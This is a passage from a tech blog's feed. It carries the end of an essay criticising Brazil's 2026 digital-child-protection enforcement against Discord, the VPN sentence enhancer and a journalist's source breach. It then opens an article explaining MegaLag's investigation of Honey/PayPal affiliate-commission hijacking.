    <a href="#the-oxymoron-you-may-encrypt-as-long-as-we-can-read-it" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Now the core of it, which is what made me write this. The ANPD&rsquo;s official justification for suspending Go Live deserves a careful read: Discord&rsquo;s architecture uses end-to-end encryption, <strong>the platform has no access to livestream content</strong>, and therefore real-time moderation is impossible. In the ANPD&rsquo;s assessment, if moderation depends on flawed automated systems and on reports from people inside the very room where the crime is happening, the feature is incompatible with the law.</p>
<p>Read that again, slowly. The ANPD didn&rsquo;t ban encryption — a direct ban would be indefensible in public. It said something else, far more ingenious: you may have end-to-end encryption, as long as you can monitor the content to comply with your legal duties.</p>
<p>Except that&rsquo;s an oxymoron. The entire point of end-to-end encryption is that the server carries ciphertext and cannot read it. To &ldquo;monitor the content,&rdquo; that content has to arrive at the servers in the clear — and then it&rsquo;s not end-to-end anymore. There is no third option: either it&rsquo;s illegible to the platform, or it&rsquo;s legible. The ANPD didn&rsquo;t criminalize encryption; it merely made it impossible to offer real encryption and operate in Brazil at the same time. Saying &ldquo;they banned cryptography&rdquo; is technically wrong. Functionally, it&rsquo;s exactly what happened.</p>
<p>And I&rsquo;m not the one saying it. Carlos Affonso Souza, director of ITS Rio, <a href="https://www.cnnbrasil.com.br/politica/discord-anpd-cria-precedente-perigoso-sobre-criptografia-diz-especialista/"target="_blank" rel="noopener">told CNN Brasil</a> this is the first time the ANPD has treated end-to-end encryption as a regulatory obstacle, a dangerous precedent comparable to the WhatsApp blocks — and that criminals will simply migrate to less cooperative platforms with no legal presence in the country (did someone say Telegram?).</p>
<p>To be fair to the debate: the law&rsquo;s text never mentions encryption once, and art. 34, §1 <a href="https://www.planalto.gov.br/ccivil_03/_ato2023-2026/2025/lei/l15211.htm"target="_blank" rel="noopener">expressly forbids</a> <em>&ldquo;massive, generic or indiscriminate surveillance mechanisms.&rdquo;</em> Fact-checkers <a href="https://www.boatos.org/tecnologia/ia-tera-acesso-a-todas-conversas-do-whatsapp-a-partir-de-hoje.html"target="_blank" rel="noopener">debunked the rumors</a> that the Digital ECA Law would read your WhatsApp. All of that is true — and all of that is about paper. In practice, the first major enforcement in the law&rsquo;s history treated the technical impossibility of surveillance as grounds to kill a feature. Paper accepts anything; the enforcer&rsquo;s pen is what writes the real law.</p>
<p>And there are hooks in the letter of the law waiting to be used: art. 18, III requires parental-control tools to <em>&ldquo;identify the profiles of adults with whom the child or adolescent communicates&rdquo;</em> — explain to me how an end-to-end encrypted messenger complies with that. Art. 27 orders providers to <em>&ldquo;remove and report&rdquo;</em> abuse content <em>&ldquo;detected&rdquo;</em> directly or indirectly — and detection presupposes seeing. Neither has been used yet. The Go Live precedent shows how they&rsquo;ll be read when they are.</p>
<blockquote>
  <p><strong>Remember this:</strong> the ANPD didn&rsquo;t ban encryption. It banned a feature whose encryption prevents content surveillance. The practical effect is identical: in Brazil, end-to-end encryption is now a regulatory risk.</p>

</blockquote>
<h2>Digital ECA Law vs. the LGPD<span class="hx:absolute hx:-mt-20" id="digital-eca-law-vs-the-lgpd"></span>
    <a href="#digital-eca-law-vs-the-lgpd" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The bigger irony is institutional. In 2018 we passed the LGPD to protect Brazilians&rsquo; personal data, built on principles like minimization (collect only what&rsquo;s necessary) and purpose limitation (use it only for what it was collected for). The Digital ECA Law, enforced by the same agency, pushes the other way.</p>
<p>Age verification is the crystal-clear example. <em>&ldquo;Self-declaration is forbidden&rdquo;</em> means every user, adults included, will have to prove their age to access ordinary services. Prove it how? ID documents, facial biometrics, verifiable credentials. <a href="https://www.gazetadopovo.com.br/vida-e-cidadania/verificacao-etaria-do-eca-digital-poe-em-risco-privacidade-de-dados/"target="_blank" rel="noopener">Gazeta do Povo heard experts</a> warning about the obvious: we&rsquo;re building a permanent identification infrastructure for everyone on the internet, with biometric data that, once leaked, can&rsquo;t be changed — you can change a password, you can&rsquo;t change your face.</p>
<p>And it&rsquo;s not theory. An <a href="https://convergenciadigital.com.br/governo/inutil-e-perigoso-cientistas-alertam-contra-sistemas-de-verificacao-de-idade-na-internet/"target="_blank" rel="noopener">open letter signed by 438 scientists from 32 countries</a> calls these systems &ldquo;useless and dangerous&rdquo;: trivially bypassed with VPNs and deepfakes, biased against minorities. And it cites the perfect example — Discord itself, which <a href="https://convergenciadigital.com.br/governo/inutil-e-perigoso-cientistas-alertam-contra-sistemas-de-verificacao-de-idade-na-internet/"target="_blank" rel="noopener">leaked ID photos of ~70,000 users</a> precisely because of outsourced age verification. The platform the ANPD is punishing for not surveilling is the same one that proved, in practice, the cost of collecting.</p>
<p>The law has safeguards on paper — art. 13 limits the use of verification data <em>&ldquo;solely for that purpose,&rdquo;</em> art. 12 talks about minimization. But notice the structural conflict of interest: the ANPD holds three mandates: LGPD, Digital ECA Law, and Marco Civil. <strong>The agency that should defend the minimization of your data is the same one now demanding you hand it over.</strong> When those two roles collide inside the same body, which one do you think wins?</p>
<h2>The other law of August 6: using a VPN now weighs on your sentence<span class="hx:absolute hx:-mt-20" id="the-other-law-of-august-6-using-a-vpn-now-weighs-on-your-sentence"></span>
    <a href="#the-other-law-of-august-6-using-a-vpn-now-weighs-on-your-sentence" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Remember how the ceremony where the First Lady demanded the block was the signing of another law? It&rsquo;s worth looking at what else was signed that day, because one article of PL 3066/2025 went almost unnoticed outside the tech bubble: <strong>art. 226-A</strong>, which <a href="https://agenciagov.ebc.com.br/noticias/202608/sancionada-lei-que-atualiza-o-eca-e-que-define-e-pune-crimes-sexuais-no-mundo-digital"target="_blank" rel="noopener">raises sentences by one third to two thirds</a> for crimes under the Child and Adolescent Statute committed using proxies, VPNs, or any IP-masking or anonymization technique.</p>
<p>Ayub, who has followed digital legislation for years, <a href="https://x.com/ayubio/status/2058990595503509513"target="_blank" rel="noopener">sounded the alarm back in May</a>, when the Chamber of Deputies approved the text: <em>&ldquo;it provides prison for anyone who develops or provides VPN services. You can&rsquo;t say I didn&rsquo;t warn you.&rdquo;</em></p>
<p>One clarification matters here, because checking sources is what separates analysis from panic. The <strong>original</strong> draft by congressman Osmar Terra did criminalize developing, distributing, or selling IP-masking software — in practice, it turned the VPN-developer profession into a crime. But the bill went through a technical working group that heard the Federal Police, prosecutors, the child-safety NGO Safernet, and the platforms themselves, and the final rapporteur, congresswoman Rogéria Santos, <a href="https://iclnoticias.com.br/projeto-contra-pedofila-quase/"target="_blank" rel="noopener">removed the development criminalization</a> and kept only the sentence enhancer, with an express safeguard for lawful use. Ayub&rsquo;s tweet describes the bill that went into the Chamber, not the law that came out. His warning, though, captured the direction — and the direction held.</p>
<p>Because what survived is already plenty. <a href="https://isoc.org.br/noticia/isoc-e-isoc-brasil-pedem-rejeicao-do-art-226-a-do-pl-3066-2025"target="_blank" rel="noopener">ISOC Brasil pointed out</a> (ISOC is the Internet Society) that the enhancer puts VPN use on the same penal footing as armed robbery. And an <a href="https://teletime.com.br/06/07/2026/vpn-senado-entidaddes/"target="_blank" rel="noopener">open letter to the Senate</a>, signed by the EFF (Electronic Frontier Foundation), the Tor Project, Artigo 19, Data Privacy Brasil, and half a dozen other organizations, explained the obvious to anyone in the field: proxies and VPNs are standard corporate security infrastructure, recommended by international standards like ISO/IEC 27001; identifier anonymization is a native feature of browsers like Firefox and Brave; and your employer probably <strong>requires</strong> you to use a VPN to work from home. The Senate didn&rsquo;t listen. On August 6, the article became law — at that very ceremony.</p>
<p>The sentence from the letter that should haunt any legislator: <em>&ldquo;legal precedents rarely remain confined to the hypothesis that justified their creation.&rdquo;</em> In the letter&rsquo;s formulation, it&rsquo;s the <strong>first time</strong> Brazilian criminal law treats a neutral security technology as, by itself, grounds for a harsher sentence. Today the hypothesis is crimes against children — the one nobody dares question in public, and the bill&rsquo;s authors knew it. Tomorrow it&rsquo;s any crime. The next congressman who wants to enhance theft &ldquo;committed through VPN use&rdquo; already has the precedent ready, voted and signed.</p>
<p>And notice the ingenuity, identical to the encryption play: nobody banned VPNs — a direct ban would be indefensible. A mechanism was merely created to treat VPN users as qualified suspects. Think about the execution: to apply the &ldquo;lawful use&rdquo; safeguard, the State first needs to know you use a VPN and then determine whether your use was lawful. In other words, every user of a privacy tool becomes, by default, a potential object of verification. The safeguard doesn&rsquo;t protect the user — it authorizes their inspection.</p>
<p>And there&rsquo;s a fine irony to close: the 438-scientist letter I mentioned in the previous section warns that age verification is bypassed with VPNs. The Brazilian legislator&rsquo;s answer wasn&rsquo;t to rethink age verification. It was to half-criminalize VPNs. The siege closes from both sides, always with the same little plaque of good intentions nailed on top.</p>
<blockquote>
  <p><strong>Remember this:</strong> nobody banned VPNs in Brazil. Something subtler was created: the first criminal-law precedent where using a neutral privacy tool weighs against you. Today it enhances crimes against children. The precedent itself has no owner.</p>

</blockquote>
<h2>And the actual criminals?<span class="hx:absolute hx:-mt-20" id="and-the-actual-criminals"></span>
    <a href="#and-the-actual-criminals" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>There&rsquo;s a contradiction in this story that almost nobody commented on. The sanction against Discord came down in six days, with a potential R$ 50 million fine per infraction. And what happens to the perpetrators of the crime that motivated all of this?</p>
<p>The Naviraí group was made up of five teenagers aged 13 to 17 and one 18-year-old. The alleged leader is 14. Under Brazilian law, <strong>only the 18-year-old answers as an adult</strong>, for qualified homicide. The other five fall under the ECA regime — the classic one, not the digital one: socio-educational internment, with a <a href="https://www.atfcursosjuridicos.com.br/repositorio/material/15893963154125-ecaparaoabatf.pdf"target="_blank" rel="noopener">three-year ceiling</a> and compulsory release at 21. The case is sealed and we don&rsquo;t know what measures were applied, but that&rsquo;s the ceiling, no matter the cruelty. The intellectual mentor of the Suzano school massacre, with 10 dead, was 17 and <a href="https://g1.globo.com/sp/mogi-das-cruzes-suzano/noticia/2019/05/03/justica-decide-manter-internacao-de-menor-apontado-como-mentor-intelectual-do-massacre-em-suzano.ghtml"target="_blank" rel="noopener">was interned</a> — three years, regardless of the body count.</p>
<p>And there&rsquo;s a calendar irony: in February 2026 Brazil <a href="https://www.brasilparalelo.com.br/noticias/lula-sanciona-lei-que-define-bullying-e-cyberbullying-como-crimes"target="_blank" rel="noopener">signed a law making online inducement to suicide and self-harm a heinous crime</a>, with doubled penalties for group leaders. For adults. For the five Naviraí teenagers, investigated for exactly that, nothing changes: the ceiling is still the ECA&rsquo;s three years.</p>
<p>It stays this way by choice, and not for lack of trying. In March 2026, the rapporteur of the Public Security constitutional amendment included a <a href="https://www.congressoemfoco.com.br/amp/noticia/116889/governo-se-manifesta-contra-a-reducao-da-maioridade-penal--ineficaz"target="_blank" rel="noopener">referendum on lowering the criminal age to 16</a>; the government called the reduction &ldquo;ineffective and unconstitutional&rdquo; and the passage was stripped so the amendment could pass — <a href="https://www.nsctotal.com.br/noticias/camara-aprova-pec-da-seguranca-publica-apos-retirada-de-mencao-a-maioridade-penal"target="_blank" rel="noopener">approved 487 to 15</a> without a single line on the subject. In June, the Chamber&rsquo;s Constitution and Justice Committee <a href="https://www.camara.leg.br/noticias/1280551-comissao-de-constituicao-e-justica-aprova-pec-que-reduz-maioridade-penal/"target="_blank" rel="noopener">approved the admissibility of another reduction amendment, 44 to 18</a>, but it still needs 308 votes in two plenary rounds — exactly the wall where the 2015 version died. Even the middle way stalls: <a href="https://www12.senado.leg.br/noticias/materias/2025/10/22/vai-a-camara-mais-tempo-de-internacao-de-adolescente-em-conflito-com-a-lei"target="_blank" rel="noopener">the bill PL 1.473/2025</a>, which would raise maximum internment from 3 to 5 years (10 for violent crimes), passed the Senate in October 2025 and has been sleeping in the Chamber ever since.</p>
<p>Meanwhile, organized crime does the math. Factions recruit teenagers on purpose, because they know the ECA shields the triggerman: in the faction attacks in Ceará, adults <a href="https://ponte.org/periferias-sao-as-principais-vitimas-dos-ataques-de-faccoes-no-ceara/"target="_blank" rel="noopener">paid R$ 1,000 to R$ 5,000 per attack</a> for teenagers to torch vehicles — the boss doesn&rsquo;t expose himself, the executor doesn&rsquo;t go to prison. The Naviraí group is the digital version of the same logic: a 14-year-old leader coordinating crimes that, committed by an adult, would mean decades in prison.</p>
<p>And Brazil has become an outlier even in its neighborhood. Argentina <a href="https://g1.globo.com/mundo/noticia/2026/02/27/argentina-aprova-lei-que-reduz-maioridade-penal-de-16-para-14-anos.ghtml"target="_blank" rel="noopener">approved lowering the age from 16 to 14 in February</a>. Sweden, of all countries, <a href="https://noticias.r7.com/prisma/espaco-prisma/com-13-anos-um-adolescente-pode-matar-e-ir-para-a-cadeia-a-suecia-decidiu-que-sim-o-brasil-ainda-nao-sabe-05022026/"target="_blank" rel="noopener">dropped to 13 for serious crimes starting in July</a> — after gangs started recruiting children on Snapchat for attacks precisely because they couldn&rsquo;t be prosecuted. England prosecutes from age 10 (though its own Bar Council wants to raise it to 14), most American states transfer 14-year-olds to criminal court for murder, Portugal at 16.</p>
<p>For the record, the other side exists: <a href="https://brasil.un.org/pt-br/317703-redu%C3%A7%C3%A3o-da-maioridade-penal-unicef-manifesta-preocupa%C3%A7%C3%A3o-com-avan%C3%A7o-da-pec-na-c%C3%A2mara-dos"target="_blank" rel="noopener">UNICEF came out against the reduction</a>, and the recidivism data is uncomfortable for both sides — ~43% after internment, ~70% after regular prison. If we&rsquo;re going to debate the model, let&rsquo;s debate it. What doesn&rsquo;t fly is the current result: a new law managed in six days to take offline a feature used by millions of innocent people, while the system that punishes the perpetrators hasn&rsquo;t moved in thirty years. We punish the pipe because the pipe is what&rsquo;s within reach.</p>
<blockquote>
  <p><strong>Remember this:</strong> six days to sanction a platform used by millions of innocent people; thirty years without touching the ceiling for those who committed the crime.</p>

</blockquote>
<h2>Meanwhile, at the Supreme Court: source protection breached<span class="hx:absolute hx:-mt-20" id="meanwhile-at-the-supreme-court-source-protection-breached"></span>
    <a href="#meanwhile-at-the-supreme-court-source-protection-breached" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>If it were only Discord, you could call it a regulatory accident. But in the same week, another pillar fell.</p>
<p>Since November 2025, journalist Luís Pablo, from Maranhão, had been publishing reports about the use of an official car of the TJ-MA (<em>Tribunal de Justiça do Maranhão</em>, the Maranhão state court) by Supreme Court minister Flávio Dino and family members. In March, Alexandre de Moraes authorized a <a href="https://www.gazetadopovo.com.br/republica/decisao-de-moraes-sobre-jornalista-cita-inquerito-das-fake-news-e-contraria-nota-oficial-do-stf/"target="_blank" rel="noopener">search and seizure against the journalist</a> — in a decision that cited the fake news inquiry, which the Court&rsquo;s press office later denied. Phones, a notebook, and a pen drive seized. In April, the equipment was returned, but the forensic analysis continued.</p>
<p>On August 11, <a href="https://g1.globo.com/jornal-nacional/noticia/2026/08/11/moraes-determina-investigacao-contra-fonte-de-jornalista-em-reportagem-sobre-dino.ghtml"target="_blank" rel="noopener">the Federal Police served warrants against Raimundo Cutrim</a>, Maranhão&rsquo;s former security secretary — identified as the journalist&rsquo;s source. How did they get to him? Through the analysis of the journalist&rsquo;s seized devices.</p>
<p>See the mechanism? Article 5, XIV of the Constitution protects source secrecy, and the journalist can refuse to reveal it — as he did, staying silent in his deposition. So they didn&rsquo;t ask. They seized his work material, read everything, and <strong>identified the source behind his back</strong>. Constitutional scholar Vera Chemin <a href="https://www.cnnbrasil.com.br/politica/especialistas-avaliam-decisao-de-moraes-sobre-fonte-de-jornalista/"target="_blank" rel="noopener">summed it up on CNN</a>: <em>&ldquo;you cannot breach the secrecy first and then check whether a crime occurred.&rdquo;</em></p>
<p>The Supreme Court itself has ruled this, more than once. In a 2019 constitutional case (ADPF 601), Gilmar Mendes <a href="https://noticias.stf.jus.br/postsnoticias/ministro-gilmar-mendes-garante-sigilo-da-fonte-a-jornalista-glenn-greenwald/"target="_blank" rel="noopener">protected Glenn Greenwald during Vaza Jato</a> with a sentence that should be framed: source secrecy <em>&ldquo;prevents the State from using coercive measures to constrain professional activity and to rummage through the way in which what is brought to public knowledge is received and transmitted.&rdquo;</em> &ldquo;Rummage through the way it is received&rdquo; is literally what the forensic analysis of the devices did.</p>
<p>For the record, the Court&rsquo;s defense exists and deserves to be presented: the investigation targets the illegal monitoring of a minister and his family, with license plates, security agents&rsquo; names, and clandestine images of children published; the Federal Police says Cutrim used his public office to access restricted systems; and there&rsquo;s a R$ 100,000 transfer from a second suspect to the journalist, whose nature nobody has proven yet. The files are sealed, so neither version is verifiable from the outside. There may be a crime there. But that&rsquo;s exactly why the order of operations matters: first you investigate by lawful means, then — maybe, in the most exceptional cases — you discuss exceptions. <strong>Reversing that order turns the exception into the method.</strong></p>
<p>The reaction was the usual one, only louder: the press associations <a href="https://www.abraji.org.br/noticias/abraji-condena-violacao-de-sigilo-de-fonte-de-jornalista-no-maranhao"target="_blank" rel="noopener">Abraji</a>, ANJ and ABERT, the Inter American Press Association, and <a href="https://www.poder360.com.br/poder-midia/globo-folha-e-estadao-criticam-stf-por-quebra-de-sigilo-da-fonte/"target="_blank" rel="noopener">editorials from the country&rsquo;s three biggest newspapers on the same day</a>. Estadão wrote that the fake news inquiry <em>&ldquo;has been converted into an instrument of intimidation.&rdquo;</em> Miro Teixeira, the lawyer who struck down the dictatorship&rsquo;s Press Law in 2009, said the Court <a href="https://www.poder360.com.br/poder-justica/stf-atua-momentaneamente-como-tribunal-de-excecao-diz-miro-teixeira/"target="_blank" rel="noopener">is acting &ldquo;momentarily as a tribunal of exception&rdquo;</a>.</p>
<blockquote>
  <p><strong>Remember this:</strong> source secrecy wasn&rsquo;t repealed, it was bypassed. Nobody coerced the journalist; they seized his devices and the source surfaced in the forensics. The guarantee still exists, but only on paper.</p>

</blockquote>
<h2>Conclusion: is Brazil becoming a censored country?<span class="hx:absolute hx:-mt-20" id="conclusion-is-brazil-becoming-a-censored-country"></span>
    <a href="#conclusion-is-brazil-becoming-a-censored-country" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>It&rsquo;s the pattern that worries me, not the isolated episodes. In 2024, X spent a month offline in Brazil by monocratic order. In 2025, art. 19 of the Marco Civil fell and platform liability went proactive. In 2026, the Digital ECA Law handed the Executive a package of obligations so intrusive that, the first time it was used, it took down an encrypted feature nationwide — while the 14-year-old leader of the group that motivated the sanction faces, at most, three years of internment. And journalistic source secrecy was breached forensically, with the blessing of the same court that enshrined it.</p>
<p>Every rung of that ladder has a sympathetic justification, and that&rsquo;s exactly why the ladder is dangerous. Nobody builds censorship infrastructure saying it&rsquo;s for censorship. You build it to protect children, to protect ministers, to protect democracy.</p>
<p>The problem is that <strong>infrastructure has no moral owner</strong>. The ruler that measures Discord today measures any app tomorrow. The enforcement that demands plaintext streams today to protect Lívia will demand plaintext for whatever the government of the day wants to see. The source breach that catches the Dino case&rsquo;s source today catches any source, in any case, against anyone.</p>
<p>And the week&rsquo;s most revealing detail: of the two platforms the Ministry of Justice asked to investigate, the sanctioned one is the one with an office, a tax ID, and lawyers in Brazil — the one that <em>cooperates</em>. The message the regulator sent the market is inverted: <strong>cooperating exposes you; being opaque protects you</strong>. The teenagers from the Naviraí neo-Nazi group aren&rsquo;t going anywhere — they&rsquo;re going to Telegram, which nobody touched.</p>
<p>And there&rsquo;s the most Brazilian trait of all in this arrangement: it became impossible to be on the right side of the law. If you truly protect your users with end-to-end encryption, you violate the Digital ECA Law. If you comply with the Digital ECA Law, you open up your users&rsquo; data and violate the LGPD. If you collect IDs for age verification, you become a leak target and a sanction target; if you don&rsquo;t collect, you become an enforcement target. <strong>There is no safe configuration.</strong></p>
<p>And that&rsquo;s a tradition of ours: laws so broad, with so many stacked exceptions, that anyone becomes an offender by accident on any street corner. When everyone is always in violation, the law stops being a rule and becomes an option — real power migrates to whoever chooses whom to apply it against. That&rsquo;s what happened this week: two platforms investigated, one punished. The one with a local address.</p>
<p>Protecting children is a non-negotiable civilizational duty. Investigating crimes against a minister is the State&rsquo;s obligation. The question that remains isn&rsquo;t whether those causes are legitimate — they are. It&rsquo;s whether Brazil can still pursue legitimate causes without demolishing the guarantees that make the country a liberal democracy: real privacy, functional encryption, a press with protected sources. This week, the answer was no three times in a row.</p>
<p>It&rsquo;s not regime censorship. In a way it&rsquo;s worse: it&rsquo;s censorship by accumulation, voted, signed, and applauded, every brick carrying a little plaque of good intentions. And you only notice the wall when it&rsquo;s already around you.</p>
]]></content:encoded><category>security</category><category>law-and-regulation</category><category>politics</category></item><item><title>Digital David and Goliath: Understanding MegaLag vs Honey/PayPal</title><link>https://www.akitaonrails.com/en/2026/08/12/digital-david-and-goliath-understanding-megalag-vs-honey-paypal/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/08/12/digital-david-and-goliath-understanding-megalag-vs-honey-paypal/</guid><pubDate>Wed, 12 Aug 2026 11:00:00 GMT</pubDate><description>&lt;p&gt;Anyone who makes content for a living knows: affiliate commission pays real bills. You test a product, record the review, drop the link in the description. Someone watches, clicks, buys days later, and a slice of the sale lands in your account. That&amp;rsquo;s how a good chunk of independent YouTube funded itself over the last decade.&lt;/p&gt;
&lt;p&gt;Now imagine finding out that one of your sponsors was planted at your viewers&amp;rsquo; checkout, swapping your tag for theirs and pocketing those commissions. Millions of times. For years.&lt;/p&gt;</description><content:encoded><![CDATA[<p>Anyone who makes content for a living knows: affiliate commission pays real bills. You test a product, record the review, drop the link in the description. Someone watches, clicks, buys days later, and a slice of the sale lands in your account. That&rsquo;s how a good chunk of independent YouTube funded itself over the last decade.</p>
<p>Now imagine finding out that one of your sponsors was planted at your viewers&rsquo; checkout, swapping your tag for theirs and pocketing those commissions. Millions of times. For years.</p>
<p>That&rsquo;s what MegaLag showed in December 2024, exposing the practices of Honey, the coupon extension PayPal bought for $4 billion that promised to <em>&ldquo;find every coupon code on the internet&rdquo;</em> for you. I&rsquo;ve followed his channel since that video and became an instant fan: this is technical journalism with live demos, code, and packet captures, not just loud accusations.</p>
<p>A year and a half later, the story has only gotten thicker: PayPal tried to dismiss it all as fake news, MegaLag came back with irrefutable technical evidence, Rakuten and other affiliate networks publicly cut Honey off, and the whole thing became a class action that just survived a motion to dismiss.</p>


<div class="embed-container">
  <iframe
    src="https://www.youtube.com/embed/vc4yL3YTwWk"
    title="YouTube video player"
    frameborder="0"
    allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share"
    referrerpolicy="strict-origin-when-cross-origin"
    allowfullscreen>
  </iframe>
</div>

<p>The video timeline, since these are the primary sources for this article:</p>
<ol>
<li><a href="https://www.youtube.com/watch?v=vc4yL3YTwWk"target="_blank" rel="noopener">Exposing the Honey Influencer Scam</a>, December 21, 2024</li>
<li><a href="https://www.youtube.com/watch?v=wwB3FmbcC88"target="_blank" rel="noopener">Exposing Honey&rsquo;s Evil Business Model (PART 2)</a>, December 22, 2025</li>
<li><a href="https://www.youtube.com/watch?v=qCGT_CKGgFE"target="_blank" rel="noopener">The Honey Scam is Worse Than I Thought</a>, December 30, 2025</li>
<li><a href="https://www.youtube.com/watch?v=EXDemfGNGz0"target="_blank" rel="noopener">Honey Gets Terminated as Lawsuits Proceed</a>, August 11, 2026 (yesterday)</li>
</ol>
<p>I&rsquo;m telling this story in three acts: the last-click trick against creators, the extortion model against stores, and the defeat device that fooled the networks&rsquo; auditors. The technical core, the part that matters to us developers, is in the third act. But without the first two it makes no sense.</p>
<h2>What Honey was supposed to be<span class="hx:absolute hx:-mt-20" id="what-honey-was-supposed-to-be"></span>
    <a href="#what-honey-was-supposed-to-be" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The consumer pitch was irresistible: a free extension that, right at checkout, tries every known coupon code and applies the best one to your cart. <em>&ldquo;It&rsquo;s literally free money.&rdquo;</em> And no, they swore, they didn&rsquo;t sell your data.</p>
<p>For content creators, Honey was a generous sponsor. MegaLag mapped roughly 5,000 sponsored videos across more than 1,000 channels, adding up to nearly 8 billion views. MrBeast was the first big name, and former Honey president Joanne Bradford bragged: <em>&ldquo;every kid in America knows what Honey is.&rdquo;</em></p>
<p>Creators got easy money for recommending a tool that seemed useful. The irony, which the first video exposes in exquisite detail: those same creators were installing on their audiences, the audiences most likely to click their affiliate links, the tool that was stealing those very commissions.</p>
<p>For stores and marketplaces, Honey sold itself as a conversion tool: less cart abandonment, higher average order value. And there was an extra, shadier pitch, right in the partner FAQ and on Honey&rsquo;s own podcast: the store controlled which coupons went live. So the consumer story was <em>&ldquo;we find every code,&rdquo;</em> while the merchant story was <em>&ldquo;you keep consumers from finding your good codes.&rdquo;</em> Both stories were official.</p>
<h2>Affiliate marketing in 30 seconds<span class="hx:absolute hx:-mt-20" id="affiliate-marketing-in-30-seconds"></span>
    <a href="#affiliate-marketing-in-30-seconds" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>To understand the crime, you need to understand the victim. Affiliate marketing works like this: a creator posts a link with a tracking tag (like <code>?tag=shortcircuit</code> on a Newegg link). You click, the store drops a cookie good for about 30 days, and if you buy anything in that window, the commission goes to whoever generated that click.</p>
<p>MegaLag has a good analogy for this: it&rsquo;s like the department-store salesman who helps you, hands you a referral card with his name on it, and the cashier knows whose sale it was. The affiliate cookie is the digital version of that card.</p>
<p>The industry standard is <strong>last-click attribution</strong>: the last click takes everything. Not the fairest system in the world, but the simplest to implement. And here&rsquo;s where the trouble lives: whoever shows up in the final second before payment always wins. And who shows up in the final second? A browser extension that wakes up exactly on the checkout screen. It&rsquo;s as if a second salesman, one who never helped you at all, snatched the card from your hand in the checkout line and handed over his own instead.</p>
<h2>What Honey actually did<span class="hx:absolute hx:-mt-20" id="what-honey-actually-did"></span>
    <a href="#what-honey-actually-did" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The first video documents the scenarios, all variations on the same trick:</p>
<ul>
<li><strong>The coupon popup</strong>: you click &ldquo;apply discounts,&rdquo; Honey opens a tiny hidden tab that simulates an affiliate click with PayPal&rsquo;s tag, then closes itself. Your creator&rsquo;s cookie gets overwritten. Commission stolen, even when Honey finds no coupon at all.</li>
<li><strong>Honey Gold</strong>: when there&rsquo;s no coupon, up pops an offer for cashback points. Click it, same thing: last click, PayPal&rsquo;s commission.</li>
<li><strong>The empty popup</strong>: no coupon, no cashback, Honey still pops up so you&rsquo;ll click &ldquo;got it.&rdquo; Clicked to dismiss? Too late, the click counted.</li>
<li><strong>The PayPal button</strong>: at a checkout that already offers PayPal, Honey shows a &ldquo;check out with PayPal&rdquo; button. Any excuse works to grab that last click.</li>
</ul>
<p>MegaLag&rsquo;s NordVPN experiment makes it concrete: a 40% commission program. Two purchases made through his own affiliate link. Without Honey: $35 in commission. With Honey Gold activated: $0. His cut, as the &ldquo;consumer,&rdquo; of the loot stolen from himself? 89 points, or <strong>89 cents</strong>. Honey kept 97.5% of what was rightfully his.</p>
<blockquote>
  <p><strong>Remember this:</strong> even when you click the creator&rsquo;s affiliate link, the commission goes to PayPal if Honey shows up at checkout. In the NordVPN test, out of $35 in commission, the &ldquo;benefit&rdquo; left for the user was 89 cents.</p>

</blockquote>
<p>And this was no hypothesis, it was happening at industrial scale. The first video&rsquo;s central example uses Linus Tech Tips&rsquo; affiliate tag on Newegg: Linus Media Group promoted Honey for years, across something like 160 sponsored segments, and ended the partnership in 2022 after noticing Honey overwrote their affiliate link <em>even when it found no discount at all</em>. Notice the demographic trap: whoever installs a coupon extension is exactly the viewer who hunts prices and clicks affiliate links. Honey paid the sponsorship once and went on taxing the creator&rsquo;s future commissions forever.</p>


<div class="embed-container">
  <iframe
    src="https://www.youtube.com/embed/wwB3FmbcC88"
    title="YouTube video player"
    frameborder="0"
    allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share"
    referrerpolicy="strict-origin-when-cross-origin"
    allowfullscreen>
  </iframe>
</div>

<p>So far, the victim was the creator. The second video shows the other side of the counter: the stores.</p>
<h2>The business model against the stores<span class="hx:absolute hx:-mt-20" id="the-business-model-against-the-stores"></span>
    <a href="#the-business-model-against-the-stores" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The extension&rsquo;s <code>supported domains</code> file listed over 180,000 stores, against &ldquo;30,000 participating&rdquo; in the marketing. The spreadsheet analysis (a developer crawled the whole thing and published it) showed 146,000 stores with no relationship at all, included presumably without consent.</p>
<p>There&rsquo;s more: a coupon typed manually at checkout was sent to Honey&rsquo;s servers <em>before</em> asking for consent. And private codes leaked into the public database: military discounts, employee codes, a $75-off code with no minimum order that meant unlimited free merchandise.</p>
<p>The damage was measurable. One store owner reported a $100,000 loss after the exclusive code from the podcast he sponsored leaked into Honey&rsquo;s database, and he only noticed months later, long after the podcast&rsquo;s affiliate commission had evaporated. Chip, the CEO of Made In Cookware, summed up the effect: <em>&ldquo;if Honey is going to take 10% of your revenue all the time, at the end of the day you&rsquo;re forced to raise prices.&rdquo;</em></p>
<p>And when a store owner asked to be removed, the official answer was <em>&ldquo;we typically do not remove codes unless we have a working relationship,&rdquo;</em> which MegaLag accurately calls economic extortion: <strong>stores don&rsquo;t pay to get in, they pay to get out</strong>.</p>
<h2>Stand down: the rule Honey pretended to follow<span class="hx:absolute hx:-mt-20" id="stand-down-the-rule-honey-pretended-to-follow"></span>
    <a href="#stand-down-the-rule-honey-pretended-to-follow" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Against all of this, PayPal&rsquo;s defense was always the same: <em>&ldquo;Honey follows industry rules and practices, including last-click attribution.&rdquo;</em> A clever rhetorical exit, because you can argue about whether last-click is fair. What comes next is different in nature: proof that Honey knew it was in the wrong and built a system to avoid getting caught.</p>
